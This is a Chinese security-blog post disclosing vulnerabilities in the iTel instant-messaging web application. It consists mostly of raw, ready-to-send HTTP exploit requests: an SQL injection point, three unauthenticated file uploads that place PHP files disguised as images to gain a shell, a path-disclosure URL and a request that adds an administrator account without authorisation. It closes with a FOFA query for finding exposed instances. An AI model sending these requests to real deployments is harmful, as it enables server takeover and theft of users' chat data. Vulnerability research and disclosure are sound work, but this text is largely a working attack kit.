iTel即时通讯-安全漏洞

899

iTel即时通讯演示

  (后台地址:127.0.0.1/admin/login.php)

iTel即时通讯-安全漏洞-

 电脑端如下:

iTel即时通讯-安全漏洞-

一. 注入 

1.前台注入0x1

  /api/group.php 注入点

iTel即时通讯-安全漏洞-

还有一处注入点在cookie处 当时觉得爆一个注入点够用了 没记录

POST /api/group.php?act=setReadTime HTTP/1.1
Host: 192.168.0.127:9301
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 122
Accept: */*
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=65i0bhevvajn2cad1k43apdrr6; auth=auth_16710716955897
Origin: http://192.168.0.127:9301
Referer: http://192.168.0.127:9301/pc/index.php
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

group_id=1&isgroup=0

2.前台getshell第一弹

POST /admin/inc/uploadsave.php?action=add HTTP/1.1
Host: 192.168.0.127:9301
Content-Length: 742
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.0.127:9301
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykz0XaGXiMD4x24GB
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.0.127:9301/admin/inc/upload.php?returnid=logo&image=1&path=ico
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: 
Connection: close

------WebKitFormBoundarykz0XaGXiMD4x24GB
Content-Disposition: form-data; name="imgurl"; filename="2.php"
Content-Type: image/jpeg

<?php phpinfo(); ?>
------WebKitFormBoundarykz0XaGXiMD4x24GB
Content-Disposition: form-data; name="returnid"

logo
------WebKitFormBoundarykz0XaGXiMD4x24GB
Content-Disposition: form-data; name="path"

ico
------WebKitFormBoundarykz0XaGXiMD4x24GB
Content-Disposition: form-data; name="pre"


------WebKitFormBoundarykz0XaGXiMD4x24GB
Content-Disposition: form-data; name="mark"


------WebKitFormBoundarykz0XaGXiMD4x24GB
Content-Disposition: form-data; name="image"

1
------WebKitFormBoundarykz0XaGXiMD4x24GB--

成功getshell

iTel即时通讯-安全漏洞-
iTel即时通讯-安全漏洞-

3.前台getshell第二弹

POST /api/upload.php?act=uploadImage HTTP/1.1
Host: 192.168.0.127:9301
Content-Length: 664
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://www.aaa.com:9301
Content-Type:multipart/form-data;boundary=----WebKitFormBoundaryFxlzCjxq9fFxcATp
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.0.127:9301/inc/upload.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: 
Connection: close

------WebKitFormBoundaryFxlzCjxq9fFxcATp
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

111<?php phpinfo(); ?>
------WebKitFormBoundaryFxlzCjxq9fFxcATp
Content-Disposition: form-data; name="imgData"

1

------WebKitFormBoundaryFxlzCjxq9fFxcATp
Content-Disposition: form-data; name="path"


------WebKitFormBoundaryFxlzCjxq9fFxcATp
Content-Disposition: form-data; name="pre"


------WebKitFormBoundaryFxlzCjxq9fFxcATp
Content-Disposition: form-data; name="mark"


------WebKitFormBoundaryFxlzCjxq9fFxcATp
Content-Disposition: form-data; name="image"

1

------WebKitFormBoundaryFxlzCjxq9fFxcATp--

 成功getshell

iTel即时通讯-安全漏洞-
iTel即时通讯-安全漏洞-

 4.前台getshell第三弹【针对某款二开 需要爆时间戳】

POST /inc/uploadsave.php?action=add HTTP/1.1
Host: 192.168.0.127:9301
Content-Length: 646
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6DI8x1Uh4LoWva9w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=jgaskfc7j1bbeecotkmabl20f4; auth=auth_16710863006460
Connection: close

------WebKitFormBoundary6DI8x1Uh4LoWva9w
Content-Disposition: form-data; name="imgurl"; filename="000.exe"
Content-Type: image/jpeg

666
------WebKitFormBoundary6DI8x1Uh4LoWva9w
Content-Disposition: form-data; name="returnid"


------WebKitFormBoundary6DI8x1Uh4LoWva9w
Content-Disposition: form-data; name="path"


------WebKitFormBoundary6DI8x1Uh4LoWva9w
Content-Disposition: form-data; name="pre"


------WebKitFormBoundary6DI8x1Uh4LoWva9w
Content-Disposition: form-data; name="mark"


------WebKitFormBoundary6DI8x1Uh4LoWva9w
Content-Disposition: form-data; name="image"

1
------WebKitFormBoundary6DI8x1Uh4LoWva9w--

二.爆绝对路径

针对某些二开无法前台getshell的兄弟想打组合拳的可以拿路径用

/style/kindeditor/php/file_manager_json.php

三.未授权添加管理员

  后台地址:127.0.0.1/admin/login.php

POST /admin/admin/action.php?action=add&id= HTTP/1.1
Host: 127.0.0.1
Content-Length: 715
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYKoHpFMhiRaD3j8G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://127.0.0.1/admin/admin/add.php?from=parent
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=2j5utsjvljt2qsa1acqq5lv0j2; auth=auth_16727381444700
Connection: close

------WebKitFormBoundaryYKoHpFMhiRaD3j8G
Content-Disposition: form-data; name="name"

test
------WebKitFormBoundaryYKoHpFMhiRaD3j8G
Content-Disposition: form-data; name="pwd"

aaa123456
------WebKitFormBoundaryYKoHpFMhiRaD3j8G
Content-Disposition: form-data; name="pwdcheck"

aaa123456
------WebKitFormBoundaryYKoHpFMhiRaD3j8G
Content-Disposition: form-data; name="realname"


------WebKitFormBoundaryYKoHpFMhiRaD3j8G
Content-Disposition: form-data; name="group"

6
------WebKitFormBoundaryYKoHpFMhiRaD3j8G
Content-Disposition: form-data; name="email"


------WebKitFormBoundaryYKoHpFMhiRaD3j8G
Content-Disposition: form-data; name="Submit"


------WebKitFormBoundaryYKoHpFMhiRaD3j8G--
iTel即时通讯-安全漏洞-

fofa 语句 :https://fofa.info/result?qbase64=Ym9keT0iL3N0YXRpYy9qcy9zb2NrZXQuanM%2Fdj0yMDIwMDUyNzIxIg%3D%3D

© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
WEB安全
# RCE
喜欢就支持一下吧
点赞9
相关推荐
iTel即时通讯-安全漏洞-麻瓜安全
iTel即时通讯-安全漏洞
iTel即时通讯-安全漏洞
1个月前 89
若依后台系统搭建和RCE复现-麻瓜安全
若依后台系统搭建和RCE复现
若依后台系统搭建和RCE复现
1个月前 80
最新上传绕宝塔waf思路,可绕 最新宝塔-麻瓜安全
最新上传绕宝塔waf思路,可绕 最新宝塔
最新上传绕宝塔waf思路,可绕 最新宝塔
1个月前 75
CobaltStrike-[Cat]-兔年快乐版本-麻瓜安全
CobaltStrike-[Cat]-兔年快乐版本
CobaltStrike-[Cat]-兔年快乐版本
1个月前 72
burpsuite插件uriSearch-麻瓜安全
burpsuite插件uriSearch
burpsuite插件uriSearch
1个月前 68
Cookie会话维持脚本-麻瓜安全
Cookie会话维持脚本
Cookie会话维持脚本
1个月前 55
热门文章TOP10
phpstorm远程服务器断点调试-配置教程-麻瓜安全

1phpstorm远程服务器断点调试-配置教程

定时采集发布文章脚本-麻瓜安全

2定时采集发布文章脚本

一键定时备份数据库和项目代码脚本-麻瓜安全

3一键定时备份数据库和项目代码脚本

利用Cloudflare saas实现cf自选ip-麻瓜安全

4利用Cloudflare saas实现cf自选ip

漫画的一些问题记录-麻瓜安全

5漫画的一些问题记录

基于Mailu搭建邮件服务器-麻瓜安全

6基于Mailu搭建邮件服务器

一键定时备份数据库和项目代码脚本-麻瓜安全

1一键定时备份数据库和项目代码脚本

ProxmoxVE(PVE)制作DD镜像包-麻瓜安全

2ProxmoxVE(PVE)制作DD镜像包

iTel即时通讯-安全漏洞-麻瓜安全

3iTel即时通讯-安全漏洞

linux如何抓取DDOS数据流量和攻击者IP地址-麻瓜安全

4linux如何抓取DDOS数据流量和攻击者IP地址

Docker容器的基本搭建和配置-麻瓜安全

5Docker容器的基本搭建和配置

python实战城堡保卫战-麻瓜安全

6python实战城堡保卫战

linux如何抓取DDOS数据流量和攻击者IP地址-麻瓜安全

1linux如何抓取DDOS数据流量和攻击者IP地址

pytorch模型不同部分使用不同学习率-麻瓜安全

2pytorch模型不同部分使用不同学习率

CobaltStrike-[Cat]-兔年快乐版本-麻瓜安全

3CobaltStrike-[Cat]-兔年快乐版本

若依后台系统搭建和RCE复现-麻瓜安全

4若依后台系统搭建和RCE复现

docker 部署PHP+ nginx环境-麻瓜安全

5docker 部署PHP+ nginx环境

Docker容器的基本搭建和配置-麻瓜安全

6Docker容器的基本搭建和配置

推荐文章

Docker容器的基本搭建和配置

如何在docker下删除两个id相同的镜像的操作docker

python读取eml文件并用正则表达式匹配邮箱的代码

漫画的一些问题记录

pytorch模型不同部分使用不同学习率

Linux如何安装telnet

标签
采集日志抓包安全工具waftelenetRCEpythonpvephpnginxlinuxgitlabdockercookieCobaltStrikecdnburpsuiteburp